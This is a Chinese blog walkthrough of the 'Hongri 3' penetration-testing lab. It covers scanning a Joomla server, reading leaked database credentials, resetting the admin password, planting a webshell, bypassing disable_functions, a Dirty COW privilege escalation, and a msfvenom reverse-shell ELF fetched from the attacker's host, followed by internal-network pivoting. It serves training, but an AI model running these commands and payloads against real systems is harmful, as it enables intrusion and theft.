红日三打靶!!!

红日三,黑盒测试

  • 环境搭建
  • 一.外网打点
    • 1.网段探测
    • 2.端口服务扫描
    • 3.目录扫描
    • 4.网站漏洞扫描
    • 5.汇总,找破绽
    • 6.登陆MySQL
      • 改密码
    • 7.进入后台,找能写马的地方
    • 8.蚁剑连接
    • 9.disable_functions绕过
      • 1.蚁剑插件绕过
      • 2.bypass_disablefunc_via_LD_PRELOAD绕过
    • 10.分析
    • 11.ssh连接
  • 二.脏牛提权
  • 三.拿root用户的meterpreter
    • 1.msfvenom创建Linux木马
    • 2.msf开启监听
    • 3.靶机下载恶意elf文件,并执行
    • 4.监听成功
  • 四.内网爆破
    • 1.添加路由
    • 2.扫描内网主机
    • 3.爆破主机
    • 4.psexec模块
  • 五.内网渗透
    • 1.frp内网穿透
    • 2.wmiexec工具
    • 3连接域控
    • 4.flag

环境搭建

红日三打靶!!!_第1张图片

需要新建一个VMnet2(192.168.93.0/24),DHCP起始的IP一定要小于10,(有一个内网主机的IP地址是192.168.93.10)

红日三打靶!!!_第2张图片红日三打靶!!!_第3张图片

web-cenctos,开启后要输入/etc/init.d/network restart 重启网卡

红日三打靶!!!_第4张图片

**五台靶机不要关机,要挂起,因为时黑盒测试,我们不知道密码,靶机中有的服务没有开机自启.(尽量拍一个快照)**

开机时,查看5个靶机的网卡状态,除了web-centos是桥接+vmnet2模式,其他都是vmnet2模式

一.外网打点

1.网段探测

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.0.115
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1     b8:3a:08:3b:f9:30       Tenda Technology Co.,Ltd.Dongguan branch
192.168.0.101   00:0c:29:32:46:c9       VMware, Inc.
192.168.0.107   7c:b5:66:a5:f0:a5       Intel Corporate

192.168.0.101是外网的服务器

2.端口服务扫描

┌──(root㉿kali)-[~]
└─# nmap -sC -sV -p- 192.168.0.101 --min-rate 10000         
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-01 23:55 EST
Nmap scan report for 192.168.0.101 (192.168.0.101)
Host is up (0.0016s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 2584c6cc2c8a7b8f4a7c60f1a3c9b022 (DSA)
|_  2048 58d14c592d85ae0769240add720f45a5 (RSA)
80/tcp   open  http    nginx 1.9.4
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-server-header: nginx/1.9.4
3306/tcp open  mysql   MySQL 5.7.27-0ubuntu0.16.04.1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.27-0ubuntu0.16.04.1
|   Thread ID: 5
|   Capabilities flags: 63487
|   Some Capabilities: Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolOld, SupportsTransactions, SupportsCompression, InteractiveClient, LongColumnFlag, LongPassword, IgnoreSigpipes, FoundRows, ConnectWithDatabase, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, ODBCClient, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: 9VS,=VV#\x04p?        8N\x7Ff`.)\x16
|_  Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:32:46:C9 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.58 seconds

3.目录扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.0.101 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.101
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 315] [--> http://192.168.0.101/images/]
/media                (Status: 301) [Size: 314] [--> http://192.168.0.101/media/]
/templates            (Status: 301) [Size: 318] [--> http://192.168.0.101/templates/]
/modules              (Status: 301) [Size: 316] [--> http://192.168.0.101/modules/]
/bin                  (Status: 301) [Size: 312] [--> http://192.168.0.101/bin/]
/plugins              (Status: 301) [Size: 316] [--> http://192.168.0.101/plugins/]
/includes             (Status: 301) [Size: 317] [--> http://192.168.0.101/includes/]
/language             (Status: 301) [Size: 317] [--> http://192.168.0.101/language/]
/components           (Status: 301) [Size: 319] [--> http://192.168.0.101/components/]
/cache                (Status: 301) [Size: 314] [--> http://192.168.0.101/cache/]
/libraries            (Status: 301) [Size: 318] [--> http://192.168.0.101/libraries/]
/tmp                  (Status: 301) [Size: 312] [--> http://192.168.0.101/tmp/]
/layouts              (Status: 301) [Size: 316] [--> http://192.168.0.101/layouts/]
/administrator        (Status: 301) [Size: 322] [--> http://192.168.0.101/administrator/]
/cli                  (Status: 301) [Size: 312] [--> http://192.168.0.101/cli/]
/server-status        (Status: 403) [Size: 278]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
┌──(root㉿kali)-[~]
└─# dirsearch -u "http://192.168.0.101"             

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                                                                                             
                                                                                                                                                                                    
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.0.101/_24-02-02_00-07-30.txt

Target: http://192.168.0.101/

[00:07:30] Starting:                                                                                                                                                                
[00:07:32] 403 -  278B  - /.configuration.php.swp                           
[00:07:34] 403 -  278B  - /.ht_wsr.txt                                      
[00:07:34] 403 -  278B  - /.htaccess.bak1                                   
[00:07:34] 403 -  278B  - /.htaccess.sample                                 
[00:07:34] 403 -  278B  - /.htaccess.save
[00:07:34] 403 -  278B  - /.htaccess_extra
[00:07:34] 403 -  278B  - /.htaccess_orig                                   
[00:07:34] 403 -  278B  - /.htaccessBAK
[00:07:34] 403 -  278B  - /.htaccessOLD2                                    
[00:07:34] 403 -  278B  - /.htaccessOLD
[00:07:34] 403 -  278B  - /.htaccess_sc                                     
[00:07:34] 403 -  278B  - /.htaccess.orig                                   
[00:07:34] 403 -  278B  - /.htpasswd_test                                   
[00:07:34] 403 -  278B  - /.htm                                             
[00:07:34] 403 -  278B  - /.html                                            
[00:07:34] 403 -  278B  - /.htpasswds                                       
[00:07:34] 403 -  278B  - /.httr-oauth                                      
[00:07:36] 403 -  278B  - /.php                                             
[00:07:38] 200 -   24KB - /1.php                                            
[00:07:38] 200 -    0B  - /2.php                                            
[00:07:51] 301 -  322B  - /administrator  ->  http://192.168.0.101/administrator/
[00:07:51] 200 -   31B  - /administrator/cache/                             
[00:07:51] 200 -   31B  - /administrator/logs/                              
[00:07:51] 200 -  525B  - /administrator/includes/                          
[00:07:51] 301 -  327B  - /administrator/logs  ->  http://192.168.0.101/administrator/logs/
[00:07:51] 200 -    2KB - /administrator/                                   
[00:07:52] 200 -    2KB - /administrator/index.php                          
[00:07:57] 200 -   31B  - /bin/                                             
[00:07:57] 301 -  312B  - /bin  ->  http://192.168.0.101/bin/               
[00:07:58] 301 -  314B  - /cache  ->  http://192.168.0.101/cache/           
[00:07:58] 200 -   31B  - /cache/                                           
[00:08:00] 200 -   31B  - /cli/                                             
[00:08:01] 200 -   31B  - /components/                                      
[00:08:01] 301 -  319B  - /components  ->  http://192.168.0.101/components/ 
[00:08:02] 200 -    0B  - /configuration.php                                
[00:08:02] 200 -    2KB - /configuration.php~                               
[00:08:12] 200 -    1KB - /htaccess.txt                                     
[00:08:13] 200 -   31B  - /images/                                          
[00:08:13] 301 -  315B  - /images  ->  http://192.168.0.101/images/         
[00:08:14] 301 -  317B  - /includes  ->  http://192.168.0.101/includes/     
[00:08:14] 200 -   31B  - /includes/                                        
[00:08:14] 200 -    4KB - /index.php                                        
[00:08:14] 200 -    3KB - /index.php/login/                                 
[00:08:17] 301 -  317B  - /language  ->  http://192.168.0.101/language/     
[00:08:17] 200 -   31B  - /layouts/                                         
[00:08:17] 301 -  318B  - /libraries  ->  http://192.168.0.101/libraries/   
[00:08:17] 200 -   31B  - /libraries/                                       
[00:08:17] 200 -    7KB - /LICENSE.txt                                      
[00:08:21] 301 -  314B  - /media  ->  http://192.168.0.101/media/           
[00:08:21] 200 -   31B  - /media/                                           
[00:08:23] 200 -   31B  - /modules/                                         
[00:08:22] 301 -  316B  - /modules  ->  http://192.168.0.101/modules/       
[00:08:30] 301 -  316B  - /plugins  ->  http://192.168.0.101/plugins/       
[00:08:30] 200 -   31B  - /plugins/                                         
[00:08:33] 200 -    2KB - /README.txt                                       
[00:08:34] 200 -  392B  - /robots.txt                                       
[00:08:35] 403 -  278B  - /server-status                                    
[00:08:35] 403 -  278B  - /server-status/                                   
[00:08:42] 301 -  318B  - /templates  ->  http://192.168.0.101/templates/   
[00:08:42] 200 -   31B  - /templates/index.html                             
[00:08:42] 200 -    0B  - /templates/protostar/
[00:08:42] 200 -    0B  - /templates/system/                                
[00:08:42] 200 -   31B  - /templates/                                       
[00:08:42] 200 -    0B  - /templates/beez3/                                 
[00:08:43] 301 -  312B  - /tmp  ->  http://192.168.0.101/tmp/               
[00:08:43] 200 -   31B  - /tmp/
[00:08:48] 200 -  628B  - /web.config.txt                                   
                                                                             
Task Completed 
:joomscan -u http://192.168.0.101
    ____  _____  _____  __  __  ___   ___    __    _  _ 
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  ( 
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                        (1337.today)
   
    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://192.168.0.101 ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.9.12

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing : 
http://192.168.0.101/administrator/components
http://192.168.0.101/administrator/modules
http://192.168.0.101/administrator/templates
http://192.168.0.101/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.0.101/administrator/

[+] Checking robots.txt existing
[++] robots.txt is found
path : http://192.168.0.101/robots.txt 
                                                                                                                                                                                    
Interesting path found from robots.txt                                                                                                                                              
http://192.168.0.101/joomla/administrator/                                                                                                                                          
http://192.168.0.101/administrator/                                                                                                                                                 
http://192.168.0.101/bin/                                                                                                                                                           
http://192.168.0.101/cache/                                                                                                                                                         
http://192.168.0.101/cli/                                                                                                                                                           
http://192.168.0.101/components/                                                                                                                                                    
http://192.168.0.101/includes/                                                                                                                                                      
http://192.168.0.101/installation/                                                                                                                                                  
http://192.168.0.101/language/                                                                                                                                                      
http://192.168.0.101/layouts/                                                                                                                                                       
http://192.168.0.101/libraries/                                                                                                                                                     
http://192.168.0.101/logs/                                                                                                                                                          
http://192.168.0.101/modules/                                                                                                                                                       
http://192.168.0.101/plugins/                                                                                                                                                       
http://192.168.0.101/tmp/                                                                                                                                                           
                                                                                                                                                                                    
                                                                                                                                                                                    
[+] Finding common backup files name                                                                                                                                                
[++] Backup files are not found                                                                                                                                                     
                                                                                                                                                                                    
[+] Finding common log files name                                                                                                                                                   
[++] error log is not found                                                                                                                                                         
                                                                                                                                                                                    
[+] Checking sensitive config.php.x file                                                                                                                                            
[++] Readable config file is found                                                                                                                                                  
 config file path : http://192.168.0.101/configuration.php~                                                                                                                         
                                                                                                                                                                                    
                                                                                                                                                                                    
                                                                                                                                                                                    
Your Report : reports/192.168.0.101/   

4.网站漏洞扫描

┌──(root㉿kali)-[~]
└─# nikto -h 192.168.0.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.101
+ Target Hostname:    192.168.0.101
+ Target Port:        80
+ Start Time:         2024-02-02 00:09:01 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.9.4
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/administrator/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/bin/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/cache/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/cli/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/components/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/language/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/layouts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/libraries/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/plugins/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 14 entries which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8740 requests: 0 error(s) and 25 item(s) reported on remote host
+ End Time:           2024-02-02 00:10:00 (GMT-5) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p 80,3306,22 192.168.0.101
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-02 00:12 EST
Nmap scan report for 192.168.0.101 (192.168.0.101)
Host is up (0.00051s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.0.101
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.0.101:80/
|     Form id: mod-search-searchword87
|     Form action: /index.php
|     
|     Path: http://192.168.0.101:80/index.php/login
|     Form id: mod-search-searchword87
|     Form action: /index.php/login
|     
|     Path: http://192.168.0.101:80/index.php/login
|     Form id: username-lbl
|     Form action: /index.php/login?task=user.login
|     
|     Path: http://192.168.0.101:80/index.php/6-your-template
|     Form id: mod-search-searchword87
|     Form action: /index.php
|     
|     Path: http://192.168.0.101:80/index.php/3-welcome-to-your-blog
|     Form id: mod-search-searchword87
|     Form action: /index.php
|     
|     Path: http://192.168.0.101:80/index.php
|     Form id: mod-search-searchword87
|     Form action: /index.php
|     
|     Path: http://192.168.0.101:80/index.php/author-login
|     Form id: mod-search-searchword87
|     Form action: /index.php/author-login
|     
|     Path: http://192.168.0.101:80/index.php/author-login
|     Form id: username-lbl
|_    Form action: /index.php/author-login?task=user.login
| http-enum: 
|   /administrator/: Possible admin folder
|   /administrator/index.php: Possible admin folder
|   /robots.txt: Robots file
|   /administrator/manifests/files/joomla.xml: Joomla version 3.9.12
|   /language/en-GB/en-GB.xml: Joomla version 3.9.12
|   /htaccess.txt: Joomla!
|   /README.txt: Interesting, a readme.
|   /bin/: Potentially interesting folder
|   /cache/: Potentially interesting folder
|   /images/: Potentially interesting folder
|   /includes/: Potentially interesting folder
|   /libraries/: Potentially interesting folder
|   /modules/: Potentially interesting folder
|   /templates/: Potentially interesting folder
|_  /tmp/: Potentially interesting folder
| http-dombased-xss: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.0.101
|   Found the following indications of potential DOM based XSS: 
|     
|     Source: window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no')
|_    Pages: http://192.168.0.101:80/, http://192.168.0.101:80/, http://192.168.0.101:80/, http://192.168.0.101:80/, http://192.168.0.101:80/index.php/6-your-template, http://192.168.0.101:80/index.php/3-welcome-to-your-blog, http://192.168.0.101:80/index.php, http://192.168.0.101:80/index.php, http://192.168.0.101:80/index.php, http://192.168.0.101:80/index.php
3306/tcp open  mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 82.80 seconds

5.汇总,找破绽

通过nmap,得知192.168.0.101开放了22,80,3306端口
还是以joomla框架搭建的网站,用joomscan工具,扫描出joomla版本是3.9.12
http://192.168.0.101/administrator/  
http://192.168.0.101/configuration.php~ 
http://192.168.0.101/robots.txt
通过一系列的查找,发现http://192.168.0.101/configuration.php~ 页面下,查看源码发现MySQL账号密码
testuser/cvcvgjASD!@

红日三打靶!!!_第5张图片

6.登陆MySQL

┌──(root㉿kali)-[~]
└─# mysql -h 192.168.0.101 -utestuser -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 2051
Server version: 5.7.27-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
+--------------------+
2 rows in set (0.007 sec)

MySQL [(none)]> use joomla
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
| am2zu_action_log_config       |
| am2zu_action_logs             |
| am2zu_action_logs_extensions  |
| am2zu_action_logs_users       |
.......

进入到joomla库中,找到am2zu_users表,为什么不找另一个user表呢?源码中有提示

改密码

MySQL [joomla]> select * from am2zu_users;
+-----+------------+---------------+---------------+----------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
| id  | name       | username      | email         | password                         | block | sendEmail | registerDate        | lastvisitDate       | activation | params | lastResetTime       | resetCount | otpKey | otep | requireReset |
+-----+------------+---------------+---------------+----------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
| 891 | Super User | administrator | [email protected] | e10adc3949ba59abbe56e057f20f883e |     0 |         1 | 2019-10-19 12:48:41 | 2024-01-30 06:35:55 | 0          | {}     | 0000-00-00 00:00:00 |          0 |        |      |            0 |
+-----+------------+---------------+---------------+----------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
1 row in set (0.003 sec)

MySQL [joomla]> update am2zu_users set password=md5(123456) where id=891;
Query OK, 0 rows affected (0.008 sec)
Rows matched: 1  Changed: 0  Warnings: 0

7.进入后台,找能写马的地方

怎么找可以写马的地方呢?
通过刚刚的目录扫描,找到后台页面,可以插入php代码且能访问的地方,或可以文件上传

红日三打靶!!!_第6张图片

红日三打靶!!!_第7张图片
红日三打靶!!!_第8张图片
红日三打靶!!!_第9张图片

8.蚁剑连接

红日三打靶!!!_第10张图片红日三打靶!!!_第11张图片在这里插入图片描述

9.disable_functions绕过

1.蚁剑插件绕过

红日三打靶!!!_第12张图片
红日三打靶!!!_第13张图片红日三打靶!!!_第14张图片

2.bypass_disablefunc_via_LD_PRELOAD绕过

git clone https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD.git

将文件中的bypass_disablefunc.php上传到网站根路径/var/www/html/

红日三打靶!!!_第15张图片

将bypass_disablefunc_x64.so上传到/var/www/下

红日三打靶!!!_第16张图片

构造payload
http://192.168.0.101/c.php?cmd=ls -al&outpath=/tmp/123&sopath=/var/www/bypass_disablefunc_x64.so 

红日三打靶!!!_第17张图片

10.分析

网站的IP地址明明是192.168.0.101,但是ip a命令,看到IP地址是192.168.93.120
netstat -ntapl命令,发现93.120的80端口和93.100的34704端口连接
说明100主机替120主机,进行代理转发

红日三打靶!!!_第18张图片
红日三打靶!!!_第19张图片>在/tmp/mysql/test.txt中发现账号密码 wwwuser/wwwuser_123Aqx

红日三打靶!!!_第20张图片

11.ssh连接

┌──(root㉿kali)-[~/kali/hr3]
└─# ssh -oHostKeyAlgorithms=+ssh-dss [email protected]
[email protected]'s password: 
Last login: Sun Oct  6 20:24:43 2019 from 192.168.1.122
[wwwuser@192 ~]$ ls
[wwwuser@192 ~]$ ls -al
总用量 28
drwx------. 3 wwwuser wwwuser 4096 10月  6 20:25 .
drwxr-xr-x. 3 root    root    4096 10月  6 16:27 ..
-rw-------. 1 wwwuser wwwuser   52 10月  6 20:25 .bash_history
-rw-r--r--. 1 wwwuser wwwuser   18 7月  18 2013 .bash_logout
-rw-r--r--. 1 wwwuser wwwuser  176 7月  18 2013 .bash_profile
-rw-r--r--. 1 wwwuser wwwuser  124 7月  18 2013 .bashrc
drwxrw----. 3 wwwuser wwwuser 4096 10月  6 16:28 .pki
[wwwuser@192 ~]$ uname -a
Linux 192.168.0.101 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

二.脏牛提权

考虑到版本低的情况我们使用脏牛提权

git clone https://github.com/firefart/dirtycow.git
1.首先将kali开启python服务
┌──(root㉿kali)-[~/kali/CVE/dirtycow]
└─# ls
dirty.c  README.md
                                                                                                                                                                                    
┌──(root㉿kali)-[~/kali/CVE/dirtycow]
└─# python3 -m http.server 9999               
Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/) ...
192.168.0.101 - - [02/Feb/2024 01:46:31] "GET /dirty.c HTTP/1.0" 200 -
2.靶机下载dirty.c,并且编译c文件
[wwwuser@192 ~]$ cd /tmp
[wwwuser@192 tmp]$ ls
passwd.bak  yum.log
[wwwuser@192 tmp]$ rm passwd.bak 
[wwwuser@192 tmp]$ wget http://192.168.0.115:9999/dirty.c
--2019-10-06 22:25:17--  http://192.168.0.115:9999/dirty.c
正在连接 192.168.0.115:9999... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:4815 (4.7K) [text/x-csrc]
正在保存至: “dirty.c”

100%[==========================================================================================================================================>] 4,815       --.-K/s   in 0s      

2019-10-06 22:25:17 (62.8 MB/s) - 已保存 “dirty.c” [4815/4815])

[wwwuser@192 tmp]$ gcc -pthread dirty.c -o dirty -lcrypt
[wwwuser@192 tmp]$ ls -al
总用量 32
drwxrwxrwt.  3 root    root     4096 10月  6 22:25 .
dr-xr-xr-x. 22 root    root     4096 10月  6 13:25 ..
-rwxrwxr-x.  1 wwwuser wwwuser 12056 10月  6 22:25 dirty
-rw-rw-r--.  1 wwwuser wwwuser  4815 1月  30 2024 dirty.c
drwxrwxrwt.  2 root    root     4096 10月  6 13:25 .ICE-unix
-rw-------.  1 root    root        0 10月  6 12:38 yum.log
[wwwuser@192 tmp]$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:
firefart:fi8RL.Us0cfSs:0:0:pwned:/root:/bin/bash

mmap: 7ff702e6c000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123456'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

3.脏牛提权是创建一个新的root用户
如上,创建了一个firefart用户,密码是刚刚自己输入的

[wwwuser@192 tmp]$ su firefart
密码:
[firefart@192 tmp]# id
uid=0(firefart) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

三.拿root用户的meterpreter

1.msfvenom创建Linux木马

┌──(root㉿kali)-[~/kali/CVE/dirtycow]
└─# msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.115 lport=5666  SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf -o shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: shell.elf


SessionCommunicationTimeout=0: 设置会话的通信超时时间为0,意味着没有超时限制。
SessionExpirationTimeout=0: 设置会话的过期时间为0,意味着没有过期限制。
-f elf: 指定输出格式为ELF文件
-o shell.elf: 输出文件名为shell.elf。

2.msf开启监听

┌──(root㉿kali)-[~]
└─# msfconsole                          
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2264 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Writing a custom module? After editing your 
module, why not try the reload command
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.115
lhost => 192.168.0.115
msf6 exploit(multi/handler) > set lport 5666
lport => 5666
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.0.115:5666

3.靶机下载恶意elf文件,并执行

[firefart@192 ~]# wget http://192.168.0.115:9999/shell.elf
--2019-10-06 22:53:15--  http://192.168.0.115:9999/shell.elf
正在连接 192.168.0.115:9999... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:250 [application/octet-stream]
正在保存至: “shell.elf”

100%[==========================================================================================================================================>] 250         --.-K/s   in 0s      

2019-10-06 22:53:15 (4.02 MB/s) - 已保存 “shell.elf” [250/250])

[firefart@192 ~]# ls
anaconda-ks.cfg  install.log  install.log.syslog  nginx-1.9.4  nginx-1.9.4.tar.gz  shell.elf
[firefart@192 ~]# chmod +x shell.elf
[firefart@192 ~]# ./shell.elf 

4.监听成功

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.0.115:5666 
[*] Sending stage (3045348 bytes) to 192.168.0.101
[*] Meterpreter session 1 opened (192.168.0.115:5666 -> 192.168.0.101:59436) at 2024-02-02 02:14:50 -0500

meterpreter > getuid
Server username: firefart
meterpreter > 

四.内网爆破

1.添加路由

meterpreter > run autoroute -s 192.168.93.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.93.0/255.255.255.0...
[+] Added route to 192.168.93.0/255.255.255.0 via 192.168.0.101
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.93.0       255.255.255.0      Session 1

meterpreter > background
[*] Backgrounding session 1...

2.扫描内网主机

use auxiliary/scanner/smb/smb_version
set rhost 192.168.93.0/24
set threads 20
run

[*] 192.168.93.10:445     - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (uptime:35s) (guid:{01d2b26e-2059-4623-81fe-17014eade877}) (authentication domain:TEST)
[+] 192.168.93.10:445     -   Host is running Windows 2012 R2 Datacenter (build:9600) (name:WIN-8GA56TNV3MV) (domain:TEST)
[*] 192.168.93.20:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.0.2) (signatures:optional) (uptime:215w 6d 0h 22m 25s) (guid:{f9644969-0bf4-48c7-ab87-58ba8044ed81}) (authentication domain:TEST)
